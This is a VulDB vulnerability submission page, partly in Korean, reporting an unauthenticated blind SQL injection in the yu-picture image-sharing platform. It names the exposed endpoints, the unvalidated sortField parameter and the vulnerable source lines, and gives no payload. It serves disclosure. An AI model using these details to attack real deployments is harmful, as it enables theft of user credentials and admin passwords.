제출 #798612: liyupi yu-picture <= 0.0.1-SNAPSHOT SQL Injection정보

제목liyupi yu-picture <= 0.0.1-SNAPSHOT SQL Injection
설명yu-picture is an enterprise-level image sharing platform based on Vue 3 + Spring Boot + MyBatis-Plus. Multiple pagination query endpoints (POST /api/picture/list/page/vo, POST /api/space/list/page/vo) are accessible without authentication and accept a user-controlled sortField parameter that is directly concatenated into the SQL ORDER BY clause via MyBatis-Plus orderBy() method without any validation or parameterization. An unauthenticated remote attacker can exploit this time-based blind SQL injection to extract arbitrary data from the database, including user credentials and admin passwords. The vulnerability exists in PictureServiceImpl.java (L336), SpaceServiceImpl.java (L224), and UserServiceImpl.java (L240), all sharing the same vulnerable pattern in the PageRequest base class.
원천⚠️ https://github.com/liyupi/yu-picture/issues/4
사용자
 anch0r (UID 96691)
제출2026. 04. 07. AM 10:29 (21 날 ago)
모더레이션2026. 04. 26. AM 03:19 (19 days later)
상태수락
VulDB 항목359633 [liyupi yu-picture 까지 a053632c41340152bf75b66b3c543d129123d8ec MyBatis-Plus PictureServiceImpl.java PageRequest sortField SQL 주입]
포인트들20

이전개요다음

Do you know our Splunk app?

Download it now for free!